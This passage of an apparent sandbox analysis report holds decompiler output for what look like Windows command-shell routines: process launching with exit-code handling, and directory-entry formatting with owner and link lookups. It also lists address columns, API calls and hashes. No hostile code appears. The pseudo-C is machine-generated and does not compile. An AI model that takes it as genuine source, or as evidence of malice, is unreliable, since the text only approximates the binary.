											_t163 =  *0x1213cb8;
											__eflags = _t163;
											if(_t163 == 0) {
												_t163 = 0x1213ab0;
											}
											_t174 =  *0x121c01c(_t177, _t135,  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0xbc)) + 0x3c)), _t163,  *(_t178 - 0xe8) & 0x0000ffff, _t178 - 0xa4, 0x1213cf0);
										}
										goto L54;
									}
									__eflags =  *0x1213cf0 - 0xc1;
									if( *0x1213cf0 == 0xc1) {
										goto L49;
									}
									goto L48;
								} else {
									L14:
									_t101 =  *(_t178 - 0xa4);
									_t174 = _t101 & 1;
									_t167 = 2;
									_t154 = _t101 & _t167;
									if(_t101 == 0) {
										L62:
										_t135 = 4;
										L16:
										 *(_t178 - 0xac) = _t177;
										 *0x1203838 = 1;
										if(_t135 != 0) {
											L26:
											__eflags = _t135 - 4;
											if(_t135 == 4) {
												_t104 =  *(_t178 - 0xa4);
												__eflags = _t104;
												if(_t104 != 0) {
													CloseHandle(_t104);
													 *(_t178 - 0xa4) = _t177;
												}
											} else {
												__eflags = _t135 - _t167;
												if(_t135 == _t167) {
													 *0x11fd54c =  *(_t178 - 0xa4);
												}
											}
											L20:
											 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
											E011E3A30();
											goto L21;
										}
										_t109 = E011E4C3E();
										 *0x120b8b0 = _t109;
										 *(_t178 - 0xa4) = _t177;
										_t177 = _t109;
										 *(_t178 - 0xac) = _t177;
										E011E274C(_t178 - 0x4c, 0x14, L"%08X", _t177);
										E011E3A50(L"=ExitCode", _t178 - 0x4c);
										if(_t177 >= 0x20) {
											__eflags = _t177 - 0x7e;
											if(_t177 > 0x7e) {
												goto L18;
											}
											E011E274C(_t178 - 0x80, 0xc, L"%01C", _t177);
											_t169 = _t178 - 0x80;
											L19:
											E011E3A50(L"=ExitCodeAscii", _t169);
											if(_t174 != 0) {
												E011F579A(L"=ExitCodeAscii", __eflags);
											}
											goto L20;
										}
										L18:
										_t169 = 0x11d24f0;
										goto L19;
									}
									_t135 =  *(_t178 - 0xa8);
									if( *0x1213ccc == 0) {
										__eflags =  *0x1213cc4;
										if( *0x1213cc4 != 0) {
											goto L16;
										}
										__eflags =  *0x1213cc9;
										if( *0x1213cc9 == 0) {
											goto L16;
										} else {
											__eflags =  *0x1218058;
											if( *0x1218058 != 0) {
												goto L16;
											}
											__eflags = _t135;
											if(_t135 != 0) {
												goto L16;
											}
											__eflags = _t154;
											if(_t154 != 0) {
												goto L62;
											}
											_t117 = E011F52E3(_t101, _t167);
											_t167 = 2;
											__eflags = _t167 - _t117;
											if(_t167 != _t117) {
												goto L16;
											}
											goto L62;
										}
										goto L26;
									}
									goto L16;
								}
							}
							L9:
							_t95 =  *0x1213cb8;
							if(_t95 == 0) {
								_t95 = 0x1213ab0;
							}
							_t98 = CreateProcessW(_t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t95, _t178 - 0x118, _t178 - 0xcc);
							goto L11;
						}
					}
					L6:
					_t165 = 0x5c;
					_t92 = E011E2349(_t135, _t165);
					if(_t92 != 0 && lstrcmpW(_t92, L"\\XCOPY.EXE") == 0) {
						E011F4478();
					}
					goto L8;
				}
			}




























                                                    0x011e3758
                                                    0x011e375d
                                                    0x011e3763
                                                    0x011e3769
                                                    0x011e376c
                                                    0x011e376f
                                                    0x011e3771
                                                    0x011e3777
                                                    0x011e377d
                                                    0x011e3783
                                                    0x011e3799
                                                    0x011e37a0
                                                    0x011e37a8
                                                    0x011eddec
                                                    0x011eddf3
                                                    0x011e39e2
                                                    0x011e39e7
                                                    0x011e39e7
                                                    0x011e37b1
                                                    0x011e37c8
                                                    0x011e37cf
                                                    0x011e37d7
                                                    0x011ede08
                                                    0x011ede0f
                                                    0x011ede1b
                                                    0x00000000
                                                    0x011e37dd
                                                    0x011e37e7
                                                    0x011e37f5
                                                    0x011e37fb
                                                    0x011e3808
                                                    0x011e380e
                                                    0x011e3817
                                                    0x011e381f
                                                    0x011e3820
                                                    0x011e3826
                                                    0x011e382c
                                                    0x011e3832
                                                    0x011e3840
                                                    0x011e3848
                                                    0x011e3853
                                                    0x011e385c
                                                    0x011e3862
                                                    0x011e3871
                                                    0x011e3873
                                                    0x011e387a
                                                    0x011e387f
                                                    0x011e3887
                                                    0x011ede3e
                                                    0x011ede3e
                                                    0x011ede43
                                                    0x011ede44
                                                    0x011ede49
                                                    0x011ede51
                                                    0x00000000
                                                    0x011ede53
                                                    0x011e3894
                                                    0x011ede59
                                                    0x011ede60
                                                    0x00000000
                                                    0x00000000
                                                    0x011ede66
                                                    0x011ede6d
                                                    0x011e38bc
                                                    0x011e38bc
                                                    0x011e38c1
                                                    0x011e38c8
                                                    0x011e39ea
                                                    0x011e39ed
                                                    0x011e39ef
                                                    0x00000000
                                                    0x00000000
                                                    0x011ede82
                                                    0x011ede87
                                                    0x011ede89
                                                    0x011ede8b
                                                    0x011ede8b
                                                    0x011edeae
                                                    0x011e38fe
                                                    0x011e38fe
                                                    0x011e3902
                                                    0x011edec3
                                                    0x011edec9
                                                    0x011edecf
                                                    0x011e3908
                                                    0x011e390e
                                                    0x011e391a
                                                    0x011e391a
                                                    0x011e3926
                                                    0x011e392b
                                                    0x011e3932
                                                    0x011eded9
                                                    0x011edee0
                                                    0x011edeee
                                                    0x011edeee
                                                    0x011edef8
                                                    0x011edf3e
                                                    0x011edf3e
                                                    0x011edf40
                                                    0x00000000
                                                    0x00000000
                                                    0x011edf50
                                                    0x011edf52
                                                    0x011edf54
                                                    0x011ede2b
                                                    0x011ede32
                                                    0x011ede39
                                                    0x011ede39
                                                    0x00000000
                                                    0x011edf54
                                                    0x011edefa
                                                    0x011edefa
                                                    0x011edeff
                                                    0x011edf01
                                                    0x011edf3c
                                                    0x011edf03
                                                    0x011edf03
                                                    0x011edf09
                                                    0x011edf0b
                                                    0x011edf0d
                                                    0x011edf0d
                                                    0x011edf38
                                                    0x011edf38
                                                    0x00000000
                                                    0x011edf01
                                                    0x011edee2
                                                    0x011edeec
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e3938
                                                    0x011e3938
                                                    0x011e3938
                                                    0x011e3943
                                                    0x011e3949
                                                    0x011e394a
                                                    0x011e394e
                                                    0x011edf98
                                                    0x011edf9a
                                                    0x011e3967
                                                    0x011e3967
                                                    0x011e3970
                                                    0x011e3977
                                                    0x011e3a0c
                                                    0x011e3a0c
                                                    0x011e3a0f
                                                    0x011edfbc
                                                    0x011edfc2
                                                    0x011edfc4
                                                    0x011edfcb
                                                    0x011edfd1
                                                    0x011edfd1
                                                    0x011e3a15
                                                    0x011e3a15
                                                    0x011e3a17
                                                    0x011e3a1f
                                                    0x011e3a1f
                                                    0x011e3a17
                                                    0x011e39d4
                                                    0x011e39d4
                                                    0x011e39db
                                                    0x00000000
                                                    0x011e39e0
                                                    0x011e3983
                                                    0x011e3988
                                                    0x011e398d
                                                    0x011e3993
                                                    0x011e3995
                                                    0x011e39a7
                                                    0x011e39b7
                                                    0x011e39bf
                                                    0x011e3a26
                                                    0x011e3a29
                                                    0x00000000
                                                    0x00000000
                                                    0x011edfac
                                                    0x011edfb4
                                                    0x011e39c6
                                                    0x011e39cb
                                                    0x011e39d2
                                                    0x011e3a49
                                                    0x011e3a49
                                                    0x00000000
                                                    0x011e39d2
                                                    0x011e39c1
                                                    0x011e39c1
                                                    0x00000000
                                                    0x011e39c1
                                                    0x011e3954
                                                    0x011e3961
                                                    0x011e39fa
                                                    0x011e3a01
                                                    0x00000000
                                                    0x00000000
                                                    0x011edf5f
                                                    0x011edf66
                                                    0x00000000
                                                    0x011edf6c
                                                    0x011edf6c
                                                    0x011edf73
                                                    0x00000000
                                                    0x00000000
                                                    0x011edf79
                                                    0x011edf7b
                                                    0x00000000
                                                    0x00000000
                                                    0x011edf81
                                                    0x011edf83
                                                    0x00000000
                                                    0x00000000
                                                    0x011edf87
                                                    0x011edf8e
                                                    0x011edf8f
                                                    0x011edf92
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011edf92
                                                    0x00000000
                                                    0x011edf66
                                                    0x00000000
                                                    0x011e3961
                                                    0x011e3932
                                                    0x011e38ce
                                                    0x011e38ce
                                                    0x011e38d5
                                                    0x011edeb9
                                                    0x011edeb9
                                                    0x011e38f8
                                                    0x00000000
                                                    0x011e38f8
                                                    0x011ede73
                                                    0x011e389a
                                                    0x011e389c
                                                    0x011e389f
                                                    0x011e38a6
                                                    0x011ede78
                                                    0x011ede78
                                                    0x00000000
                                                    0x011e38a6

                                                    APIs
                                                    • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,011FBDF8,00000108,011DC897,?,00000000,00000000,00000000), ref: 011E37A0
                                                    • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 011E37CF
                                                    • memset.MSVCRT ref: 011E37E7
                                                    • memset.MSVCRT ref: 011E3840
                                                    • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 011E3853
                                                      • Part of subcall function 011E3320: _wcsnicmp.MSVCRT ref: 011E33A4
                                                    • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 011E38AE
                                                    • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 011E38F8
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011E391A
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 011EDDE6
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 011EDE02
                                                    • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 011EDE1B
                                                    • CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 011EDEAE
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011EDFCB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: AttributeProcThread$CloseCreateErrorHandleLastListProcessmemset$DeleteInfoInitializeStartupUpdateUser_wcsnicmplstrcmp
                                                    • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                    • API String ID: 1603632292-3461277227
                                                    • Opcode ID: d0212f88b018fa2c7bbe61fd571eaffbaab7243a03d1f4fe3e08752a976e5537
                                                    • Instruction ID: 7396ef928c09472166a9c33fab79b4b2353d4f7010d55a68d293c9705eedfb2b
                                                    • Opcode Fuzzy Hash: d0212f88b018fa2c7bbe61fd571eaffbaab7243a03d1f4fe3e08752a976e5537
                                                    • Instruction Fuzzy Hash: E9C19570A106159EDF3CDBE9AC4CBAA7AF9BB55704F004099E619D7244EB708984CF52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E6550, Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 535COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E011E6550(void* _a4, signed int _a8, void* _a12, signed int* _a16, void* _a20, signed int* _a24, char _a28, long _a32, char _a36, long _a40, short _a42, int _a44, void _a48, int _a564, int _a568, signed int _a572, int _a576, char _a612, void _a648, intOrPtr _a1152, char _a1156, int _a1168, signed int _a1172, char* _a1176, char _a1184, intOrPtr _a1208, void _a1212, signed int _a1220, signed short _a1222, signed int _a1224, signed int _a1226, signed int _a17612) {
				struct _SECURITY_DESCRIPTOR* _v0;
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t187;
				signed int _t190;
				signed int _t191;
				void* _t192;
				signed int _t195;
				signed int _t201;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr _t217;
				signed int _t219;
				signed int _t221;
				signed int _t223;
				signed int* _t228;
				signed int _t237;
				signed int _t240;
				WCHAR* _t241;
				void* _t242;
				signed int _t243;
				void* _t245;
				signed int _t256;
				void* _t257;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				WCHAR* _t281;
				signed int _t282;
				signed int _t285;
				signed int _t286;
				signed int _t306;
				struct _SECURITY_DESCRIPTOR* _t310;
				signed int _t311;
				void* _t312;
				signed int _t313;
				char* _t314;
				struct _SECURITY_DESCRIPTOR* _t315;
				void* _t316;
				intOrPtr _t317;
				intOrPtr* _t331;
				void* _t337;
				void* _t345;
				void* _t364;
				void* _t371;
				void* _t373;
				intOrPtr _t374;
				intOrPtr _t381;
				char* _t383;
				intOrPtr _t388;
				intOrPtr _t389;
				signed int* _t394;
				void* _t395;
				int _t396;
				void* _t399;
				void* _t400;
				signed int _t401;
				signed int _t402;

				_t402 = _t401 & 0xfffffff8;
				E011E8290(0x44d4);
				_t187 =  *0x11fd0b4; // 0x1805bc26
				_a17612 = _t187 ^ _t402;
				_t371 = _a4;
				_t310 = _a8;
				_t399 = _a12;
				_t394 = _a16;
				_t316 =  &(_t310->Owner);
				_a4 = _t316;
				_t317 =  *((intOrPtr*)(_t316 + 0x1c));
				 *((intOrPtr*)(_t371 + 0x28)) =  *((intOrPtr*)(_t371 + 0x28)) +  *((intOrPtr*)(_t316 + 0x20));
				_a12 = _t371;
				asm("adc [edx+0x2c], ecx");
				_t190 =  *_t394;
				_t372 = _t190;
				_v0 = _t310;
				_a24 = _t394;
				if((_t190 & 0x00000010) != 0) {
					__eflags = _t190;
					if(_t190 < 0) {
						goto L1;
					}
					 *_t394 = _t190 & 0xffffffef;
					_t195 = E011E65F0(_t394, _a12, _t399, _t394);
					_t372 =  *_t394 | 0x00000010;
					 *_t394 = _t372;
					__eflags = _t195;
					if(_t195 != 0) {
						L5:
						_pop(_t395);
						_pop(_t400);
						_pop(_t312);
						return E011E6FD0(_t195, _t312, _a17612 ^ _t402, _t372, _t395, _t400);
					}
					_t372 = _t372 | 0x80000000;
					 *_t394 = _t372;
				}
				L1:
				if((_t372 & 0x00000040) == 0) {
					__eflags = _t372 & 0x00000004;
					if((_t372 & 0x00000004) == 0) {
						__eflags = _t372 & 0x00000402;
						if(__eflags == 0) {
							_t191 =  *(_t310 + 2) & 0x0000ffff;
							__eflags = _t191;
							if(_t191 == 0) {
								_t192 = 0x2c;
							} else {
								_t192 = 0x2c + _t191 * 2;
							}
							_t311 = E011FA49A(_t399, _t372, _t192 +  &(_t310->Owner), _t317);
							__eflags = _t311;
							if(_t311 == 0) {
								_t373 = 0xe;
								E011F7A11(_t399, _t373);
								_t372 = _t394[0x17];
								_t311 = E011FA3E9(_t399, _t394[0x17],  *_t394, _a4);
							}
							__eflags =  *(_t399 + 8);
							if( *(_t399 + 8) == 0) {
								L4:
								_t195 = _t311;
								goto L5;
							}
							_t195 = E011DB610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L4;
						}
						_t325 = _t399;
						_t372 = _t394[0x17];
						_t311 = E011FA2C1(_t310, _t399, _t394[0x17], __eflags, _t394[0x17], _a4);
						_t200 = 0;
						_a24 = 0;
						__eflags = _t311;
						if(_t311 != 0) {
							L70:
							__eflags =  *(_t399 + 8) - _t200;
							if( *(_t399 + 8) == _t200) {
								L72:
								__eflags =  *_t394 & 0x00100000;
								if(( *_t394 & 0x00100000) == 0) {
									goto L4;
								}
								_t201 = E011E7797(_t325);
								__eflags = _t201;
								if(_t201 == 0) {
									goto L4;
								}
								_a1172 = 1;
								_a1176 = 0x104;
								_a1168 = 0;
								memset( &_a648, 0, 0x104);
								_t402 = _t402 + 0xc;
								__eflags = _a1172;
								_t210 = E011E0C70( &_a648, ((0 | _a1172 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
								__eflags = _t210;
								if(_t210 < 0) {
									L91:
									__imp__??_V@YAXPAX@Z(_a1168);
									goto L4;
								}
								_t329 = _a1168;
								__eflags = _a1168;
								if(_a1168 == 0) {
									_t329 =  &_a648;
								}
								_t372 = _a1176;
								_t214 = E011E51C9(_t329, _a1176,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
								__eflags = _t214;
								if(_t214 == 0) {
									_t215 = _a1168;
									__eflags = _t215;
									if(_t215 == 0) {
										_t215 =  &_a648;
									}
									_t372 = 0;
									_t216 =  *0x121c00c(_t215, 0,  &_a48, 0);
									_v16 = _t216;
									__eflags = _t216 - 0xffffffff;
									if(_t216 != 0xffffffff) {
										do {
											_t331 =  &_a40;
											_t372 = _t331 + 2;
											do {
												_t217 =  *_t331;
												_t331 = _t331 + 2;
												__eflags = _t217 - _a16;
											} while (_t217 != _a16);
											__eflags = _t331 - _t372 >> 1 - 2;
											if(__eflags < 0) {
												L85:
												_t372 =  *_t394;
												_t219 = E011F9FD6(_t399,  *_t394, __eflags, _v12,  &_a32);
												_t311 = _t219;
												__eflags = _t311;
												if(_t311 != 0) {
													goto L89;
												}
												__eflags =  *(_t399 + 8) - _t219;
												if( *(_t399 + 8) == _t219) {
													goto L89;
												}
												_t223 = E011DB610(_t311, _t399, _t394);
												_a8 = _t223;
												__eflags = _t223;
												if(_t223 == 0) {
													goto L89;
												}
												__imp__??_V@YAXPAX@Z(_a1152);
												_t195 = _a8;
												goto L5;
											}
											__eflags = _a42 - 0x3a;
											if(__eflags == 0) {
												goto L89;
											}
											goto L85;
											L89:
											_t221 =  *0x121c038(_v16,  &_a32);
											__eflags = _t221;
										} while (_t221 != 0);
										FindClose(_v24);
									}
								}
								goto L91;
							}
							_t325 = _t399;
							_t195 = E011DB610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L72;
						}
						__eflags =  *_t394 & 0x00000400;
						if(( *_t394 & 0x00000400) == 0) {
							_t374 =  *0x11fd190; // 0x13
							_t375 = _t374 + 0x13;
							__eflags = _t374 + 0x13;
						} else {
							_t315 = _v0;
							__eflags =  *(_t315 + 2);
							if( *(_t315 + 2) != 0) {
								_t389 =  *0x11fd190; // 0x13
								_t364 = _t399;
								E011F7A11(_t364, _t389 + 0x13);
								_push(_t364);
								E011E6740(_t399,  *_t394, _t315 + 0x30 + ( *(_t315 + 2) & 0x0000ffff) * 2);
							}
							_t388 =  *0x11fd190; // 0x13
							_t375 = _t388 + 0x20;
						}
						_t337 = _t399;
						E011F7A11(_t337, _t375);
						_t372 =  *_t394;
						_t313 = L"...";
						_a8 = _t313;
						__eflags = _t372 & 0x00040000;
						if((_t372 & 0x00040000) == 0) {
							L42:
							_push(_t337);
							_t325 = _t399;
							_a16 = _a4 + 0x2c;
							_t311 = E011E6740(_t399, _t372, _a4 + 0x2c);
							_t228 = _v4;
							__eflags =  *_t228 & 0x00000400;
							if(( *_t228 & 0x00000400) == 0) {
								L69:
								_t200 = 0;
								__eflags = 0;
								goto L70;
							}
							__eflags = _t228[9] & 0x20000000;
							if((_t228[9] & 0x20000000) == 0) {
								goto L69;
							}
							_a568 = 1;
							_a572 = 0x104;
							_a564 = 0;
							memset( &_a44, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a568;
							_t237 = E011E0C70( &_a44, ((0 | _a568 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t237;
							if(_t237 < 0) {
								L67:
								_t372 = L"%s";
								E011E6B76(_t399, L"%s", L" [.]");
								L68:
								__imp__??_V@YAXPAX@Z(_a564);
								_pop(_t325);
								goto L69;
							}
							_t341 = _a564;
							__eflags = _a564;
							if(_a564 == 0) {
								_t341 =  &_a44;
							}
							_t240 = E011E51C9(_t341, _a572,  *((intOrPtr*)(_a8 + 4)), _a12);
							__eflags = _t240;
							if(_t240 != 0) {
								goto L67;
							} else {
								_t241 = _a564;
								__eflags = _t241;
								if(_t241 == 0) {
									_t241 =  &_a44;
								}
								_t242 = CreateFileW(_t241, 8, 7, 0, 3, 0x2200000, 0);
								_a12 = _t242;
								__eflags = _t242 - 0xffffffff;
								if(_t242 != 0xffffffff) {
									_t243 = DeviceIoControl(_t242, 0x900a8, 0, 0,  &_a1212, 0x4002,  &_a32, 0);
									_t372 = L"%s";
									_t345 = _t399;
									__eflags = _t243;
									if(_t243 != 0) {
										E011E6B76(_t345, L"%s", L" [");
										__eflags = _a1208 - 0xa0000003;
										if(_a1208 != 0xa0000003) {
											__eflags = _a1212 - 0xa000000c;
											if(_a1212 != 0xa000000c) {
												_t396 = 6;
												L63:
												_t133 = _t396 + 2; // 0x8
												_t245 = E011E00B0(_t133);
												_v4 = _t245;
												__eflags = _t245;
												if(_t245 != 0) {
													memcpy(_t245, _a4, _t396);
													_t402 = _t402 + 0xc;
													__eflags = 0;
													 *((short*)(_v4 + (_t396 >> 1) * 2)) = 0;
													E011E6B76(_t399, L"%s", _v4);
													E011E0040(_v8);
												}
												_t372 = L"%s";
												E011E6B76(_t399, L"%s", "]");
												_t394 = _a16;
												goto L66;
											}
											_t396 = _a1226 & 0x0000ffff;
											_a4 = _t402 + 0x4e4 + ((_a1224 & 0x0000ffff) >> 1) * 2;
											__eflags = _t396;
											if(_t396 != 0) {
												goto L63;
											}
											_t256 = (_a1220 & 0x0000ffff) >> 1;
											__eflags = _t256;
											_t257 = _t402 + 0x4e4 + _t256 * 2;
											L61:
											_t396 = _a1222 & 0x0000ffff;
											_a4 = _t257;
											goto L63;
										}
										_t396 = _a1226 & 0x0000ffff;
										_a4 = _t402 + 0x4e0 + ((_a1224 & 0x0000ffff) >> 1) * 2;
										__eflags = _t396;
										if(_t396 != 0) {
											goto L63;
										}
										_t257 = _t402 + 0x4e0 + ((_a1220 & 0x0000ffff) >> 1) * 2;
										goto L61;
									}
									_push(L" [...]");
									goto L54;
								} else {
									_push(L" [..]");
									_t372 = L"%s";
									_t345 = _t399;
									L54:
									E011E6B76(_t345, _t372);
									L66:
									CloseHandle(_a12);
									goto L68;
								}
							}
						} else {
							_a16 = 0x101;
							_a20 = 0;
							_a568 = 0;
							_a28 = 0x10;
							_a572 = 1;
							_a576 = 0x104;
							memset( &_a48, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a572;
							_t272 = E011E0C70( &_a48, ((0 | _a572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t272;
							if(_t272 >= 0) {
								_t273 = E011E00B0(0x10000);
								_v0 = _t273;
								__eflags = _t273;
								if(_t273 != 0) {
									_t354 = _a568;
									__eflags = _a568;
									if(_a568 == 0) {
										_t354 =  &_a48;
									}
									_t277 = E011E51C9(_t354, _a576,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
									__eflags = _t277;
									if(_t277 != 0) {
										L33:
										E011E6B76(_t399, L"%s", _t313);
										goto L36;
									} else {
										_t281 = _a568;
										__eflags = _t281;
										if(_t281 == 0) {
											_t281 =  &_a48;
										}
										_t282 = GetFileSecurityW(_t281, 1, _v0, 0x10000,  &_a40);
										__eflags = _t282;
										if(_t282 == 0) {
											goto L33;
										} else {
											_t285 = GetSecurityDescriptorOwner(_v0,  &_a20,  &_a44);
											__eflags = _t285;
											if(_t285 == 0) {
												goto L33;
											}
											_t286 = E011E7797( &_a40);
											__eflags = _t286;
											if(_t286 == 0) {
												L34:
												_push(_t313);
												_t383 = L"%s";
												L35:
												E011E6B76(_t399, _t383);
												__eflags = 0;
												_a16 = 0;
												L36:
												E011E0040(_v0);
												L37:
												__eflags =  *_t394 & 0x00000400;
												_t381 =  *0x11fd190; // 0x13
												if(( *_t394 & 0x00000400) == 0) {
													_t382 = _t381 + 0x2a;
													__eflags = _t381 + 0x2a;
												} else {
													_t382 = _t381 + 0x37;
												}
												E011F7A11(_t399, _t382);
												L41:
												__imp__??_V@YAXPAX@Z(_a568);
												_t372 =  *_t394;
												_pop(_t337);
												goto L42;
											}
											 *0x121c034(0, _a20,  &_a648,  &_a16,  &_a1184,  &_a28,  &_a36);
											__eflags = 0;
											if(0 == 0) {
												goto L34;
											}
											_t314 = L"%s";
											E011E6B76(_t399, _t314,  &_a1156);
											E011E6B76(_t399, _t314, "\\");
											_t383 = _t314;
											_push( &_a612);
											goto L35;
										}
									}
								}
								E011E6B76(_t399, L"%s", _t313);
								goto L37;
							}
							E011E6B76(_t399, L"%s", _t313);
							goto L41;
						}
					}
					_t306 = E011FAB79(_t399, _t372, _a4);
					L3:
					_t311 = _t306;
					goto L4;
				}
				_t306 = E011E660F(_t399, _t372,  *((intOrPtr*)(_a12 + 4)), _a4);
				goto L3;
			}






































































                                                    0x011e6555
                                                    0x011e655d
                                                    0x011e6562
                                                    0x011e6569
                                                    0x011e6570
                                                    0x011e6574
                                                    0x011e6578
                                                    0x011e657c
                                                    0x011e657f
                                                    0x011e6585
                                                    0x011e6589
                                                    0x011e658c
                                                    0x011e658f
                                                    0x011e6593
                                                    0x011e6596
                                                    0x011e6598
                                                    0x011e659a
                                                    0x011e659e
                                                    0x011e65a4
                                                    0x011ef9ae
                                                    0x011ef9b0
                                                    0x00000000
                                                    0x00000000
                                                    0x011ef9bf
                                                    0x011ef9c1
                                                    0x011ef9c8
                                                    0x011ef9cb
                                                    0x011ef9cd
                                                    0x011ef9cf
                                                    0x011e65ca
                                                    0x011e65d1
                                                    0x011e65d2
                                                    0x011e65d3
                                                    0x011e65de
                                                    0x011e65de
                                                    0x011ef9d5
                                                    0x011ef9db
                                                    0x011ef9db
                                                    0x011e65aa
                                                    0x011e65ad
                                                    0x011ef9e2
                                                    0x011ef9e5
                                                    0x011ef9f8
                                                    0x011ef9fe
                                                    0x011f0030
                                                    0x011f0034
                                                    0x011f0037
                                                    0x011f0044
                                                    0x011f0039
                                                    0x011f0039
                                                    0x011f0039
                                                    0x011f0053
                                                    0x011f0055
                                                    0x011f0057
                                                    0x011f005b
                                                    0x011f005e
                                                    0x011f0067
                                                    0x011f0073
                                                    0x011f0073
                                                    0x011f0075
                                                    0x011f0079
                                                    0x011e65c8
                                                    0x011e65c8
                                                    0x00000000
                                                    0x011e65c8
                                                    0x011f0081
                                                    0x011f0086
                                                    0x011f0088
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f008e
                                                    0x011efa08
                                                    0x011efa0b
                                                    0x011efa13
                                                    0x011efa15
                                                    0x011efa17
                                                    0x011efa1b
                                                    0x011efa1d
                                                    0x011efeac
                                                    0x011efeac
                                                    0x011efeaf
                                                    0x011efec0
                                                    0x011efec0
                                                    0x011efec6
                                                    0x00000000
                                                    0x00000000
                                                    0x011efecc
                                                    0x011efed1
                                                    0x011efed3
                                                    0x00000000
                                                    0x00000000
                                                    0x011efede
                                                    0x011efee8
                                                    0x011efef1
                                                    0x011eff00
                                                    0x011eff0e
                                                    0x011eff11
                                                    0x011eff27
                                                    0x011eff2c
                                                    0x011eff2e
                                                    0x011f001d
                                                    0x011f0024
                                                    0x00000000
                                                    0x011f002a
                                                    0x011eff34
                                                    0x011eff3b
                                                    0x011eff3d
                                                    0x011eff3f
                                                    0x011eff3f
                                                    0x011eff4a
                                                    0x011eff5c
                                                    0x011eff61
                                                    0x011eff63
                                                    0x011eff69
                                                    0x011eff70
                                                    0x011eff72
                                                    0x011eff74
                                                    0x011eff74
                                                    0x011eff7b
                                                    0x011eff85
                                                    0x011eff8b
                                                    0x011eff8f
                                                    0x011eff92
                                                    0x011eff98
                                                    0x011eff98
                                                    0x011eff9c
                                                    0x011eff9f
                                                    0x011eff9f
                                                    0x011effa2
                                                    0x011effa5
                                                    0x011effa5
                                                    0x011effb0
                                                    0x011effb3
                                                    0x011effbd
                                                    0x011effbd
                                                    0x011effca
                                                    0x011effcf
                                                    0x011effd1
                                                    0x011effd3
                                                    0x00000000
                                                    0x00000000
                                                    0x011effd5
                                                    0x011effd8
                                                    0x00000000
                                                    0x00000000
                                                    0x011effdc
                                                    0x011effe1
                                                    0x011effe5
                                                    0x011effe7
                                                    0x00000000
                                                    0x00000000
                                                    0x011efff0
                                                    0x011efff6
                                                    0x00000000
                                                    0x011efffa
                                                    0x011effb5
                                                    0x011effbb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0000
                                                    0x011f0009
                                                    0x011f000f
                                                    0x011f000f
                                                    0x011f0017
                                                    0x011f0017
                                                    0x011eff92
                                                    0x00000000
                                                    0x011eff63
                                                    0x011efeb1
                                                    0x011efeb3
                                                    0x011efeb8
                                                    0x011efeba
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011efeba
                                                    0x011efa23
                                                    0x011efa29
                                                    0x011efa65
                                                    0x011efa6b
                                                    0x011efa6b
                                                    0x011efa2b
                                                    0x011efa2b
                                                    0x011efa2f
                                                    0x011efa33
                                                    0x011efa35
                                                    0x011efa3b
                                                    0x011efa40
                                                    0x011efa4b
                                                    0x011efa55
                                                    0x011efa55
                                                    0x011efa5a
                                                    0x011efa60
                                                    0x011efa60
                                                    0x011efa6e
                                                    0x011efa70
                                                    0x011efa75
                                                    0x011efa77
                                                    0x011efa7c
                                                    0x011efa80
                                                    0x011efa86
                                                    0x011efc60
                                                    0x011efc67
                                                    0x011efc69
